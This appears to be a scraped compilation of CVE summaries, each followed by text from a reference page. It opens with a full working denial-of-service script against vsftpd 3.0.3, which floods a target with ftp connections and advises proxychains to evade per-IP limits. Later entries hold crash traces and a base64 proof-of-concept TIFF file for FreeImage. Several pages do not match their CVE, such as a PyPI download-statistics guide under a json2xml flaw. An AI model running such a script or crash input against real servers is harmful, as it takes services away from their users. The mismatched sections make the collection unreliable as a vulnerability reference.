VSFTPD 3.0.3 allows attackers to cause a denial of service due to limited number of connections allowed.

**vsftpd 3.0.3 - Remote Denial of Service**

    # Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
    # Date: 22-03-2021
    # Exploit Author: xynmaps
    # Vendor Homepage: https://security.appspot.com/vsftpd.html
    # Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
    # Version: 3.0.3
    # Tested on: Parrot Security OS 5.9.0
    
    #-------------------------------#
    
    #encoding=utf8
    #__author__ = XYN/Dump/NSKB3
    #VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
    """
    VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
    you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
    (if it's limited, just run this script from different proxies using proxychains, and it will work)
    """
    
    import socket
    import sys
    import threading
    import subprocess
    import time
    
    banner = """
    ._________________.
    |     VS-FTPD     |
    |      D o S      |
    |_________________|
    |By XYN/DUMP/NSKB3|
    |_|_____________|_|
    |_|_|_|_____|_|_|_|
    |_|_|_|_|_|_|_|_|_|
    
    """
    usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
    
    def test(t,p):
    	s = socket.socket()
    	s.settimeout(10)
    	try:
    		s.connect((t, p))
    		response = s.recv(65535)
    		s.close()
    		return 0
    	except socket.error:
    		print("Port {} is not open, please specify a port that is open.".format(p))
    		sys.exit()
    def attack(targ, po, id):
    	try:
    		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    		#print("Worker {} running".format(id))
    	except OSError: pass
    def main():
    	global target, port, start
    	print banner
    	try:
    		target = sys.argv[1]
    	except:
    		print usage
    		sys.exit()
    	try:
    		port = int(sys.argv[2])
    	except:
    		port = 21
    	try:
    		conns = int(sys.argv[3])
    	except:
    		conns = 50
    	print("[!] Testing if {0}:{1} is open".format(target, port))
    	test(target, port)
    	print("[+] Port {} open, starting attack...".format(port))
    	time.sleep(2)
    	print("[+] Attack started on {0}:{1}!".format(target, port))
    	def loop(target, port, conns):
    		global start
    		threading.Thread(target=timer).start()
    		while 1:
    			for i in range(1, conns + 3):
    				t = threading.Thread(target=attack, args=(target,port,i,))
    				t.start()
    				if i > conns + 2:
    					t.join()
    					break
    					loop()
    
    	t = threading.Thread(target=loop, args=(target, port, conns,))
    	t.start()
    
    def timer():
            start = time.time()
            while 1:
                    if start < time.time() + float(900): pass
                    else:
                            subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                            t = threading.Thread(target=loop, args=(target, port,))
    			t.start()
                            break
    
    main()

CVE-2021-30047: OffSec’s Exploit Database Archive

Memcached 1.6.0 before 1.6.3 allows remote attackers to cause a denial of service (daemon crash) via a crafted meta command.

memcached maintainer,

I found a NULL pointer reference bug in code of memcached, which could conduct DoS by remote artificial command.

The affected memcached version: >1.6.0.

The bug location is at file: memcached.c, detailed information as the following:

In the function "process\_mget\_command", the local variable "errstr" is defined as a char\*, which is not initialized.  

In certain condition, the function "\_meta\_flag\_preparse" is called in "process\_mget\_command", and the address of "errstr" is the 4th param.  
In the function "\_meta\_flag\_preparse", there is chances that the "\*errstr" is not initialized while command is "F" or "S".  

then, out\_errstring->out\_string->strlen referencing a NULL pointer, conduct a crash.

BR  
Zhibin

CVE-2020-22570: NULL pointer reference conduct DoS · Issue #636 · memcached/memcached

Buffer overflow vulnerability in quote_for_pmake in asm/nasm.c in nasm before 2.15.05 allows attackers to cause a denial of service via crafted file.

NameLast modifiedSizeDescription

Parent Directory  -   doc/2020-08-28 09:05 - Online documentation dos/2020-08-28 09:08 - MS-DOS executables linux/2020-08-28 09:08 - Linux packages macosx/2020-08-28 09:08 - MacOS X packages win32/2020-08-28 09:08 - Windows packages (32 bit) win64/2020-08-28 09:08 - Windows packages (64 bit) git.id2020-08-28 09:08 41 Corresponding git revision ID nasm-2.15.05-xdoc.tar.bz22020-08-28 09:05 900KDownloadable documentation nasm-2.15.05-xdoc.tar.gz2020-08-28 09:05 1.0MDownloadable documentation nasm-2.15.05-xdoc.tar.xz2020-08-28 09:05 804KDownloadable documentation nasm-2.15.05-xdoc.zip2020-08-28 09:05 1.0MDownloadable documentation nasm-2.15.05.tar.bz22020-08-28 09:04 1.2MSource code nasm-2.15.05.tar.gz2020-08-28 09:04 1.6MSource code nasm-2.15.05.tar.xz2020-08-28 09:04 972KSource code nasm-2.15.05.zip2020-08-28 09:05 1.8MSource code

CVE-2022-29654: Index of /pub/nasm/releasebuilds/2.15.05

The json2xml package through 3.12.0 for Python allows an error in typecode decoding enabling a remote attack that can lead to an exception, causing a denial of service.

This section covers how to use the public PyPI download statistics dataset to learn more about downloads of a package (or packages) hosted on PyPI. For example, you can use it to discover the distribution of Python versions used to download a package.

Contents

*   Background
    
*   Public dataset
    
    *   Getting set up
        
    *   Data schema
        
    *   Useful queries
        
        *   Counting package downloads
            
        *   Package downloads over time
            
        *   Python versions over time
            
        *   Getting absolute links to artifacts
            
*   Caveats
    
*   Additional tools
    
    *   google-cloud-bigquery
        
    *   pypinfo
        
    *   pandas-gbq
        
*   References
    

**Background¶**

PyPI does not display download statistics for a number of reasons: 1

*   **Inefficient to make work with a Content Distribution Network (CDN):** Download statistics change constantly. Including them in project pages, which are heavily cached, would require invalidating the cache more often, and reduce the overall effectiveness of the cache.
    
*   **Highly inaccurate:** A number of things prevent the download counts from being accurate, some of which include:
    
    *   pip’s download cache (lowers download counts)
        
    *   Internal or unofficial mirrors (can both raise or lower download counts)
        
    *   Packages not hosted on PyPI (for comparisons sake)
        
    *   Unofficial scripts or attempts at download count inflation (raises download counts)
        
    *   Known historical data quality issues (lowers download counts)
        
*   **Not particularly useful:** Just because a project has been downloaded a lot doesn’t mean it’s good; Similarly just because a project hasn’t been downloaded a lot doesn’t mean it’s bad!
    

In short, because it’s value is low for various reasons, and the tradeoffs required to make it work are high, it has been not an effective use of limited resources.

**Public dataset¶**

As an alternative, the Linehaul project streams download logs from PyPI to Google BigQuery 2, where they are stored as a public dataset.

**Getting set up¶**

In order to use Google BigQuery to query the public PyPI download statistics dataset, you’ll need a Google account and to enable the BigQuery API on a Google Cloud Platform project. You can run up to 1TB of queries per month using the BigQuery free tier without a credit card

*   Navigate to the BigQuery web UI.
    
*   Create a new project.
    
*   Enable the BigQuery API.
    

For more detailed instructions on how to get started with BigQuery, check out the BigQuery quickstart guide.

**Data schema¶**

Linehaul writes an entry in a bigquery-public-data.pypi.file_downloads table for each download. The table contains information about what file was downloaded and how it was downloaded. Some useful columns from the table schema include:

  

Column

Description

Examples

timestamp

Date and time

2020-03-09 00:33:03 UTC

file.project

Project name

pipenv, nose

file.version

Package version

0.1.6, 1.4.2

details.installer.name

Installer

pip, bandersnatch

details.python

Python version

2.7.12, 3.6.4

**Useful queries¶**

Run queries in the BigQuery web UI by clicking the “Compose query” button.

Note that the rows are stored in a partitioned table, which helps limit the cost of queries. These example queries analyze downloads from recent history by filtering on the timestamp column.

**Counting package downloads¶**

The following query counts the total number of downloads for the project “pytest”.

#standardSQL
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()

num\_downloads

26190085

To count downloads from pip only, filter on the details.installer.name column.

#standardSQL
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  AND details.installer.name = 'pip'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()

num\_downloads

24334215

**Package downloads over time¶**

To group by monthly downloads, use the TIMESTAMP_TRUNC function. Also filtering by this column reduces corresponding costs.

#standardSQL
SELECT
  COUNT(\*) AS num\_downloads,
  DATE\_TRUNC(DATE(timestamp), MONTH) AS \`month\`
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE
  file.project = 'pytest'
  -- Only query the last 6 months of history
  AND DATE(timestamp)
    BETWEEN DATE\_TRUNC(DATE\_SUB(CURRENT\_DATE(), INTERVAL 6 MONTH), MONTH)
    AND CURRENT\_DATE()
GROUP BY \`month\`
ORDER BY \`month\` DESC

 

num\_downloads

month

1956741

2018-01-01

2344692

2017-12-01

1730398

2017-11-01

2047310

2017-10-01

1744443

2017-09-01

1916952

2017-08-01

**Python versions over time¶**

Extract the Python version from the details.python column. Warning: This query processes over 500 GB of data.

#standardSQL
SELECT
  REGEXP\_EXTRACT(details.python, r"\[0-9\]+\\.\[0-9\]+") AS python\_version,
  COUNT(\*) AS num\_downloads,
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE
  -- Only query the last 6 months of history
  DATE(timestamp)
    BETWEEN DATE\_TRUNC(DATE\_SUB(CURRENT\_DATE(), INTERVAL 6 MONTH), MONTH)
    AND CURRENT\_DATE()
GROUP BY \`python\_version\`
ORDER BY \`num\_downloads\` DESC

 

python

num\_downloads

3.7

18051328726

3.6

9635067203

3.8

7781904681

2.7

6381252241

null

2026630299

3.5

1894153540

**Getting absolute links to artifacts¶**

It’s sometimes helpful to be able to get the absolute links to download artifacts from PyPI based on their hashes, e.g. if a particular project or release has been deleted from PyPI. The metadata table includes the path column, which includes the hash and artifact filename.

Note

The URL generated here is not guaranteed to be stable, but currently aligns with the URL where PyPI artifacts are hosted.

SELECT
  CONCAT('https://files.pythonhosted.org/packages', path) as url
FROM
  \`bigquery-public-data.pypi.distribution\_metadata\`
WHERE
  filename LIKE 'sampleproject%'

url

https://files.pythonhosted.org/packages/eb/45/79be82bdeafcecb9dca474cad4003e32ef8e4a0dec6abbd4145ccb02abe1/sampleproject-1.2.0.tar.gz

https://files.pythonhosted.org/packages/56/0a/178e8bbb585ec5b13af42dae48b1d7425d6575b3ff9b02e5ec475e38e1d6/sampleproject\_nomura-1.2.0-py2.py3-none-any.whl

https://files.pythonhosted.org/packages/63/88/3200eeaf22571f18d2c41e288862502e33365ccbdc12b892db23f51f8e70/sampleproject\_nomura-1.2.0.tar.gz

https://files.pythonhosted.org/packages/21/e9/2743311822e71c0756394b6c5ab15cb64ca66c78c6c6a5cd872c9ed33154/sampleproject\_doubleyoung18-1.3.0-py2.py3-none-any.whl

https://files.pythonhosted.org/packages/6f/5b/2f3fe94e1c02816fe23c7ceee5292fb186912929e1972eee7fb729fa27af/sampleproject-1.3.1.tar.gz

**Caveats¶**

In addition to the caveats listed in the background above, Linehaul suffered from a bug which caused it to significantly under-report download statistics prior to July 26, 2018. Downloads before this date are proportionally accurate (e.g. the percentage of Python 2 vs. Python 3 downloads) but total numbers are lower than actual by an order of magnitude.

**Additional tools¶**

Besides using the BigQuery console, there are some additional tools which may be useful when analyzing download statistics.

**google-cloud-bigquery¶**

You can also access the public PyPI download statistics dataset programmatically via the BigQuery API and the google-cloud-bigquery project, the official Python client library for BigQuery.

from google.cloud import bigquery

\# Note: depending on where this code is being run, you may require
\# additional authentication. See:
\# https://cloud.google.com/bigquery/docs/authentication/
client \= bigquery.Client()

query\_job \= client.query("""
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()""")

results \= query\_job.result()  \# Waits for job to complete.
for row in results:
    print("{} downloads".format(row.num\_downloads))

**pypinfo¶**

pypinfo is a command-line tool which provides access to the dataset and can generate several useful queries. For example, you can query the total number of download for a package with the command pypinfo package_name.

Install pypinfo using pip.

python3 \-m pip install pypinfo

Usage:

$ pypinfo requests
Served from cache: False
Data processed: 6.87 GiB
Data billed: 6.87 GiB
Estimated cost: $0.04

| download\_count |
| -------------- |
|      9,316,415 |

**pandas-gbq¶**

The pandas-gbq project allows for accessing query results via Pandas.

**References¶**

1

PyPI Download Counts deprecation email

2

PyPI BigQuery dataset announcement email

CVE-2022-25024: Analyzing PyPI package downloads — Python Packaging User Guide

A stack overflow vulnerability exists in function econf_writeFile in file atlibeconf/lib/libeconf.c in libeconf 0.5.1 allows attackers to cause a Denial of service or execute arbitrary code.

#ifdef HAVE\_CONFIG\_H # include #endif #include #include #include "libeconf.h" /\* Test case: \* Reading, merging and writing string data \*/ int main(int argc, char \*argv\[\]) { econf\_err error; // Read test data econf\_file \*kf\_fromfile; error = econf\_readFile(&kf\_fromfile, argv\[1\], "=", "#"); if (error || kf\_fromfile == NULL) { fprintf (stderr, "ERROR: couldn't read /usr/etc configuration file: %s\\n", econf\_errString(error)); return 1; } // Rewrite file to disk econf\_writeFile(kf\_fromfile, "./corpus", "out.ini"); // And reading it again econf\_file \*kf\_compare; error = econf\_readFile(&kf\_compare, "./corpus/out.ini", "=", "#"); if (error || kf\_compare == NULL) { fprintf (stderr, "ERROR: couldn't read written /usr/etc configuration file: %s\\n", econf\_errString(error)); return 1; } remove("./corpus/out.ini"); // Comparing the data const char \*compare\[\] = {"test", "test2", "test3", "test4", "test5", "test6"}; for (int i = 0; i < 6; i++) { char \*val\_fromfile, \*val\_compare; econf\_getStringValue(kf\_fromfile, "test", compare\[i\], &val\_fromfile); econf\_getStringValue(kf\_compare, "test", compare\[i\], &val\_compare); if (val\_fromfile == NULL && val\_compare == NULL) continue; if (val\_fromfile == NULL || val\_compare == NULL) { fprintf (stderr, "ERROR: saved values are different\\n"); return 1; } if(strcmp(val\_fromfile, val\_compare) != 0) { fprintf (stderr, "ERROR: saved values are different '%s' - '%s'\\n", val\_fromfile, val\_compare); return 1; } free(val\_fromfile); free(val\_compare); } // Merge two econf\_files. One value is a NULL value. econf\_file \*kf\_freshini; econf\_newIniFile(&kf\_freshini); econf\_setStringValue(kf\_freshini, "test", "test", NULL); econf\_file \*kf\_merged; econf\_mergeFiles(&kf\_merged, kf\_freshini, kf\_fromfile); econf\_free(kf\_freshini); econf\_free(kf\_merged); econf\_free(kf\_compare); econf\_free(kf\_fromfile); return 0; }

CVE-2023-30078

An issue was discovered in PostgreSQL 12.2 allows attackers to cause a denial of service via repeatedly sending SIGHUP signals.

CVE-2020-21469: Buffer overflow when continuously send SIGHUP to postgres

Buffer Overflow vulnerability in function C_IStream::read in PluginEXR.cpp in FreeImage 3.18.0 allows remote attackers to run arbitrary code and cause other impacts via crafted image file.

*   Summary
*   Files
*   Reviews
*   Support
*   Mailing Lists
*   Code
*   Tickets ▾
    *   Feature Requests
    *   Patches
    *   Bugs
    *   Support Requests
*   News
*   Discussion
*   FreeImage

Menu ▾ ▴

Milestone: None

Status: pending

Labels: None

Priority: 5

Updated: 2021-04-04

Created: 2019-12-04

Private: No

There is a heap-buffer-overflow in function C\_IStream::read of PluginEXR.cpp whick may cause a code execution or denial of service. Version of Freeimage is 3180. This vulneribility can be reproduced with the attachment image file.  
Asan log as below:

\==2194\==ERROR: AddressSanitizer: heap\-buffer\-overflow on address 0xf3b06d00 at pc 0x08087ebd bp 0xffe389d8 sp 0xffe385b0
WRITE of size 329845 at 0xf3b06d00 thread T0
    #0 0x8087ebc in fread (/home/FreeImage/test+0x8087ebc)
    #1 0x883a341 in \_ReadProc(void\*, unsigned int, unsigned int, void\*) /home/FreeImage/Source/FreeImage/FreeImageIO.cpp:32:19
    #2 0x816a96f in C\_IStream::read(char\*, int) /home/FreeImage/Source/FreeImage/PluginEXR.cpp:66:26
    #3 0x851cd1f in Imf\_2\_2::(anonymous namespace)::readPixelData(Imf\_2\_2::InputStreamMutex\*, Imf\_2\_2::ScanLineInputFile::Data\*, int, char\*&, int&) /home/FreeImage/Source/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:440:25
    #4 0x8519bd7 in Imf\_2\_2::(anonymous namespace)::newLineBufferTask(IlmThread\_2\_2::TaskGroup\*, Imf\_2\_2::InputStreamMutex\*, Imf\_2\_2::ScanLineInputFile::Data\*, int, int, int, Imf\_2\_2::OptimizationMode) /home/FreeImage/Source/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1033:14
    #5 0x8519bd7 in Imf\_2\_2::ScanLineInputFile::readPixels(int, int) /home/FreeImage/Source/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1612:44
    #6 0x849dba8 in Imf\_2\_2::InputFile::readPixels(int, int) /home/FreeImage/Source/OpenEXR/IlmImf/ImfInputFile.cpp:815:23
    #7 0x81638a2 in Load(FreeImageIO\*, void\*, int, int, void\*) /home/FreeImage/Source/FreeImage/PluginEXR.cpp:428:9
    #8 0x814d00b in FreeImage\_LoadFromHandle /home/FreeImage/Source/FreeImage/Plugin.cpp:388:24
    #9 0x814d00b in FreeImage\_Load /home/FreeImage/Source/FreeImage/Plugin.cpp:408:22
    #10 0x811a7a0 in main /home/FreeImage/test.cpp:115:8
    #11 0xf71fefb8 in \_\_libc\_start\_main /build/glibc\-jYPHgv/glibc\-2.30/csu/../csu/libc\-start.c:308:16
    #12 0x806f8f5 in \_start (/home/FreeImage/test+0x806f8f5)

0xf3b06d00 is located 0 bytes to the right of 6144\-byte region \[0xf3b05500,0xf3b06d00)
allocated by thread T0 here:
    #0 0x80e6675 in malloc (/home/FreeImage/test+0x80e6675)
    #1 0x8510c1f in Imf\_2\_2::EXRAllocAligned(unsigned int, unsigned int) /home/FreeImage/Source/OpenEXR/IlmImf/ImfSystemSpecific.h:139:12
    #2 0x8510c1f in Imf\_2\_2::ScanLineInputFile::initialize(Imf\_2\_2::Header const&) /home/FreeImage/Source/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1132:58
    #3 0x8511e19 in Imf\_2\_2::ScanLineInputFile::ScanLineInputFile(Imf\_2\_2::Header const&, Imf\_2\_2::IStream\*, int) /home/FreeImage/Source/OpenEXR/IlmImf/ImfScanLineInputFile.cpp:1190:5
    #4 0x8496904 in Imf\_2\_2::InputFile::initialize() /home/FreeImage/Source/OpenEXR/IlmImf/ImfInputFile.cpp:553:32
    #5 0x8498d15 in Imf\_2\_2::InputFile::InputFile(Imf\_2\_2::IStream&, int) /home/FreeImage/Source/OpenEXR/IlmImf/ImfInputFile.cpp:450:13
    #6 0x8161d1f in Load(FreeImageIO\*, void\*, int, int, void\*) /home/FreeImage/Source/FreeImage/PluginEXR.cpp:193:18
    #7 0x814d00b in FreeImage\_LoadFromHandle /home/FreeImage/Source/FreeImage/Plugin.cpp:388:24
    #8 0x814d00b in FreeImage\_Load /home/FreeImage/Source/FreeImage/Plugin.cpp:408:22
    #9 0x811a7a0 in main /home/FreeImage/test.cpp:115:8
    #10 0xf71fefb8 in \_\_libc\_start\_main /build/glibc\-jYPHgv/glibc\-2.30/csu/../csu/libc\-start.c:308:16

SUMMARY: AddressSanitizer: heap\-buffer\-overflow (/home/FreeImage/test+0x8087ebc) in fread
Shadow bytes around the buggy address:
  0x3e760d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x3e760d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x3e760d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x3e760d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x3e760d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x3e760da0:\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e760db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e760dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e760dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e760de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e760df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==2194\==ABORTING

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2020-21426: FreeImage / Bugs / #300 heap-buffer-overflow in function C_IStream::read of PluginEXR.cpp

NULL pointer dereference vulnerability in FreeImage before 1.18.0 via the FreeImage_CloneTag function inFreeImageTag.cpp.

> tl;dr:  
> When Load TIFF format files, field "StripOffsets" is read from file. If the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy().

When the program Open a TIFF format file, it will be handed to the "TIFFFdOpen()" function of the 'PluginTIFF.cpp' file,  
in "TIFFFdOpen()" functions, it call "TIFFReadDirectory()" function, and it use "hack" code. So field "StripOffsets" will set nullptr sometimes.

int
TIFFReadDirectory(TIFF\* tif){
......
        if ((tif->tif\_dir.td\_compression==COMPRESSION\_OJPEG) &&
            (isTiled(tif)==0) &&
            (tif->tif\_dir.td\_nstrips==1)) {
            /\*
             \* XXX: OJPEG hack.
             \* If a) compression is OJPEG, b) it's not a tiled TIFF,
             \* and c) the number of strips is 1,
             \* then we tolerate the absence of stripoffsets tag,
             \* because, presumably, all required data is in the
             \* JpegInterchangeFormat stream.
             \*/
            TIFFSetFieldBit(tif, FIELD\_STRIPOFFSETS);
......
}

When we Load a TIFF format file, it will be handed to the "Load()" function of the 'PluginTIFF.cpp' file, it will call FreeImage\_CloneTag() with tag 'StripOffsets' finally.

FITAG \* DLL\_CALLCONV 
FreeImage\_CloneTag(FITAG \*tag) {
    if(!tag) return NULL;

    // allocate a new tag
    FITAG \*clone \= FreeImage\_CreateTag();
    if(!clone) return NULL;

    try {
        // copy the tag
        FITAGHEADER \*src\_tag \= (FITAGHEADER \*)tag\->data;
        FITAGHEADER \*dst\_tag \= (FITAGHEADER \*)clone\->data;

        // tag ID
        dst\_tag\->id \= src\_tag\->id;
        // tag key
        if(src\_tag\->key) {
            dst\_tag\->key \= (char\*)malloc((strlen(src\_tag\->key) + 1) \* sizeof(char));
            if(!dst\_tag\->key) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->key, src\_tag\->key);
        }
        // tag description
        if(src\_tag\->description) {
            dst\_tag\->description \= (char\*)malloc((strlen(src\_tag\->description) + 1) \* sizeof(char));
            if(!dst\_tag\->description) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->description, src\_tag\->description);
        }
        // tag data type
        dst\_tag\->type \= src\_tag\->type;
        // tag count
        dst\_tag\->count \= src\_tag\->count;
        // tag length
        dst\_tag\->length \= src\_tag\->length;
        // tag value
        switch(dst\_tag\->type) {
            case FIDT\_ASCII:
                dst\_tag\->value \= (BYTE\*)malloc((src\_tag\->length + 1) \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);
                ((BYTE\*)dst\_tag\->value)\[src\_tag\->length\] \= 0;
                break;
            default:
                dst\_tag\->value \= (BYTE\*)malloc(src\_tag\->length \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);                    //<---- src\_tag\->value \= nullptr
                break;
        }

        return clone;

    } catch(const char \*message) {
        FreeImage\_DeleteTag(clone);
        FreeImage\_OutputMessageProc(FIF\_UNKNOWN, message);
        return NULL;
    }
}

So if the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy(). It allows an attacker to cause Denial of Service.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(8558.62d4): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=cbc20000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=00aff42c ebp\=00aff458 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(8558.62d4): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=00000008 ebx\=06a8bff8 ecx\=00000002 edx\=00000008 esi\=00000000 edi\=0fd44ff8
eip\=102a6e77 esp\=00aff500 ebp\=00aff54c iopl\=0         nv up ei pl nz ac po nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010212
FreeImage!memcpy+0x507:
102a6e77 8b16            mov     edx,dword ptr \[esi\]  ds:002b:00000000\=????????
0:000\> kv
 \# ChildEBP RetAddr      Args to Child              
00 00aff504 1006577c     0fd44ff8 00000000 00000008 FreeImage!memcpy+0x507 (FPO: \[3,0,2\]) (CONV: cdecl) \[d:\\agent\\\_work\\4\\s\\src\\vctools\\crt\\vcruntime\\src\\string\\i386\\memcpy.asm @ 657\] 
01 00aff54c 10003dd0     0fd3efe8 00000001 0fd32ff8 FreeImage!FreeImage\_CloneTag+0x13c
02 00aff590 1006ba21     00000001 06a87ff8 0fd36ff0 FreeImage!FreeImage\_SetMetadata+0x3c0
03 00aff5d8 1006bb17     06a87ff8 1006bccd 06a87ff8 FreeImage!tiff\_read\_geotiff\_profile+0xa91 (FPO: \[Uses EBP\] \[2,11,4\])
04 00aff634 100356a2     06a87ff8 06a63c88 00aff900 FreeImage!tiff\_read\_exif\_tags+0x47
05 00aff664 10036c8b     06a63c88 06a87ff8 06a52fc8 FreeImage!\_TIFFmemcmp+0xae2
06 00aff8ac 1000d9de     00aff900 06a52fc8 105f0700 FreeImage!\_TIFFmemcmp+0x20cb (FPO: \[5,139,3\])
07 00aff8e0 1000da60     00000012 00aff900 06a52fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
08 00aff90c 00b0107b     00000012 06a4efee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/tiff;base64,SUkqAAgAAAAFAAABAwABAAAAMDAAAAEBAwABAAAAMDAAAAMBAwABAAAABgAAAAYBAwABAAAAAAAAAB4ABAAMAAAABAAAAAAAAAAAAAAAAAA\=

CVE-2021-40264: FreeImage / Bugs / #335 A NULL pointer dereference exists in function FreeImage_CloneTag() located in PluginTIFF.cpp

A stack-use-after-scope issue discovered in expand_mmac_params function in preproc.c in nasm before 2.15.04 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392643?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21686: Invalid Bug ID

Stack overflow vulnerability in ast_selectors.cpp: in function Sass::ComplexSelector::has_placeholder in libsass:3.6.5-8-g210218, which can be exploited by attackers to cause a denial of service (DoS).

****1\. Description****

A stack-overflow has occurred in Sass::ComplexSelector::has_placeholder() of src/ast_selectors.cpp:464 when running program ./sassc/bin/sassc, this can reproduce on the lattest commit.

****2\. Software version info****

$ git log -1
commit 2102188d21d2b7577c2b3edb12832e90786a2831 (HEAD -\> master, origin/master, origin/HEAD)
Merge: 006bbf5c f0605a31
Author: Marcel Greter <doyouspam@ocbnet.ch\>
Date:   Fri Sep 9 20:41:03 2022 +0200

    Merge pull request #3176 from LilyWangLL/vcpkg-instructions
    
    Add vcpkg installation instructions

$ ./sassc/bin/sassc --version
sassc: 3.6.2
libsass: 3.6.5-8-g210218
sass2scss: 1.1.1
sass: 3.5

****3\. System version info****

Ubuntu 20.04.2 LTS
Linux 5.4.0-65-generic

****4\. Command********5\. Result****

WARNING on line 2, column 50 of /libsass/pocs/poc4:
In Sass, "&&" means two copies of the parent selector. You probably want to use "and" instead.

WARNING on line 2, column 51 of /libsass/pocs/poc4:
In Sass, "&&" means two copies of the parent selector. You probably want to use "and" instead.

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3226316==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe6a56aff8 (pc 0x000000b98979 bp 0x000000000000 sp 0x7ffe6a56b000 T0)
    #0 0xb98978 in Sass::ComplexSelector::has\_placeholder() const src/ast\_selectors.cpp:464
    #1 0xa2f688 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::ComplexSelector\*) src/remove\_placeholders.cpp:36
    #2 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SelectorList\*) src/remove\_placeholders.cpp:52
    #3 0xa2ce1f in Sass::Remove\_Placeholders::remove\_placeholders(Sass::SimpleSelector\*) src/remove\_placeholders.cpp:22
    #4 0xa2ead2 in Sass::Remove\_Placeholders::remove\_placeholders(Sass::CompoundSelector\*) src/remove\_placeholders.cpp:29
